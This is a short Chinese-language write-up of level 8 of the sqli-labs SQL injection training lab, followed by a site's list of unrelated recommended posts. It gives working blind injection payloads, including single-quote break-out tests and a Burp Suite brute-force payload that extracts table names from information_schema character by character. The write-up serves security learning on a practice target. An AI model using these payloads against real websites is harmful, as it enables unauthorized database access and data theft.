sqllab第八关通关笔记

知识点:

  • 这里感觉是一个单纯的单引号绕过
  • bp爆破配置的条件和第七关一样

首先判断注入类型

构造id=1/0

回显成功

构造id=1'

错误回显,感觉又是一个单引号绕过

构造id=1''

正常回显了,说明不错,就是一个单引号绕过

构造payload:id=1' and 1=1 --+

正常回显,绝杀了

利用数据库名再试一下

构造id=1' and database()='security' --+

成功回显

接下来就是利用bp进行爆破了;设置和上一关一样

构造的payload:id=1%27+and+mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),§1§,1)=%27§e§%27--+

对相关设置进行配置;和第七关一样的爆破配置;最后也是需要进行过滤的;虽然这里的长度是不一样的,但是直接利用过滤和排序获取的信息更加的规整好看

10

相关推荐
sealaugh322 小时前
aws(学习笔记第四十八课) appsync-graphql-dynamodb
笔记·学习·aws
freexyn4 小时前
Matlab自学笔记六十一:快速上手解方程
数据结构·笔记·matlab
很小心的小新5 小时前
12、jvm运行期优化
java·开发语言·jvm·笔记
寻丶幽风7 小时前
论文阅读笔记——NoPoSplat
论文阅读·笔记·三维重建·3dgs·相机位姿·dustr
西岭千秋雪_9 小时前
Redis缓存架构实战
java·redis·笔记·学习·缓存·架构
XvnNing9 小时前
【Verilog硬件语言学习笔记4】FPGA串口通信
笔记·学习·fpga开发
海棠蚀omo10 小时前
C++笔记-位图和布隆过滤器
开发语言·c++·笔记
大胡子大叔10 小时前
webrtc-streamer视频流播放(rstp协议h264笔记)
笔记·webrtc·rtsp·webrtc-streamer
山野万里__11 小时前
C++与Java内存共享技术:跨平台与跨语言实现指南
android·java·c++·笔记
寻丶幽风13 小时前
论文阅读笔记——VGGT: Visual Geometry Grounded Transformer
论文阅读·笔记·transformer·三维重建·3dgs·vggt